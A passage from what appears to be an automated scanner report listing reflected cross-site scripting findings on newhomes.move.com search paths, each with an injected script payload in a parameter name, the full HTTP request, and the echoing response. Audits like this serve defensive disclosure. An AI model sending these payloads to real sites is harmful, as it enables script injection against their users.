gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31"><script>alert(1)</script>b122dc6b5fa=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31">
...[SNIP]...

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 634c0--><script>alert(1)</script>24754516b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174?634c0--><script>alert(1)</script>24754516b9a=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=z2q4km45qwznqi55l2zmrg45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0--><script>alert(1)</script>24754516b9a=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0-->
...[SNIP]...

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b60"><script>alert(1)</script>efb2d8e3b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174?a4b60"><script>alert(1)</script>efb2d8e3b8d=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:42 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=wgsjt3yc1ozc3l45idb1cv45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:42 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:42 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60"><script>alert(1)</script>efb2d8e3b8d=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60">
...[SNIP]...

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42dbc"><script>alert(1)</script>82ed0c235b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174/city-fort+mill?42dbc"><script>alert(1)</script>82ed0c235b1=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:47 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=gba5g455itkjwa45tfjs3kq2; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:47 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 173715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc"><script>alert(1)</script>82ed0c235b1=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc">
...[SNIP]...

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46d92--><script>alert(1)</script>7f5af089e29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174/city-fort+mill?46d92--><script>alert(1)</script>7f5af089e29=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:55 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zrrw3qjk3wkfv455acwb3k45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:55 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92--><script>alert(1)</script>7f5af089e29=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92-->
...[SNIP]...

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 506e9--><script>alert(1)</script>d887f385758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-177?506e9--><script>alert(1)</script>d887f385758=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=aqw2da3giqdu4knfvqjgln55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9--><script>alert(1)</script>d887f385758=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9-->
...[SNIP]...

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2032"><script>alert(1)</script>4cf364eea8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-177?c2032"><script>alert(1)</script>4cf364eea8b=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=xywlpfzqpzpxn4rgc4bivgix; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032"><script>alert(1)</script>4cf364eea8b=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032">
...[SNIP]...

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9751"><script>alert(1)</script>db94b3e8444 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18?f9751"><script>alert(1)</script>db94b3e8444=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=4ydqttqmnj0uxkqz2fe5ntmn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 197988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751"><script>alert(1)</script>db94b3e8444=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751">
...[SNIP]...

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 162ed--><script>alert(1)</script>28afb1b29a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18?162ed--><script>alert(1)</script>28afb1b29a8=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=2rs5k355bbeyy2fwhwvrbx55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 198065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed--><script>alert(1)</script>28afb1b29a8=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed-->
...[SNIP]...

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac969"><script>alert(1)</script>b554311ff46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-avondale?ac969"><script>alert(1)</script>b554311ff46=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=qqgt2hmru4a2kw45q3siahby; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 187815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969"><script>alert(1)</script>b554311ff46=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969">
...[SNIP]...

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7457--><script>alert(1)</script>71771dcee16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-avondale?e7457--><script>alert(1)</script>71771dcee16=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=s4pk0ly3pd5wvmf2su0cqk45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:56 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457--><script>alert(1)</script>71771dcee16=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457-->
...[SNIP]...

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207b1"><script>alert(1)</script>4ee4cd55297 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-buckeye?207b1"><script>alert(1)</script>4ee4cd55297=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1gfq2255yyjb2pyocnm03245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1"><script>alert(1)</script>4ee4cd55297=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1">
...[SNIP]...

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60fb9--><script>alert(1)</script>bb17cbf6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-buckeye?60fb9--><script>alert(1)</script>bb17cbf6454=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:03 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ujeksd55tey4ds45fumcndyw; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:03 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:23:03 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9--><script>alert(1)</script>bb17cbf6454=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9-->
...[SNIP]...

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939a2"><script>alert(1)</script>e5a48127910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-cumming?939a2"><script>alert(1)</script>e5a48127910=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ixvulrjjshyhpl55uv0lr155; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 178455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2"><script>alert(1)</script>e5a48127910=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2">
...[SNIP]...

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

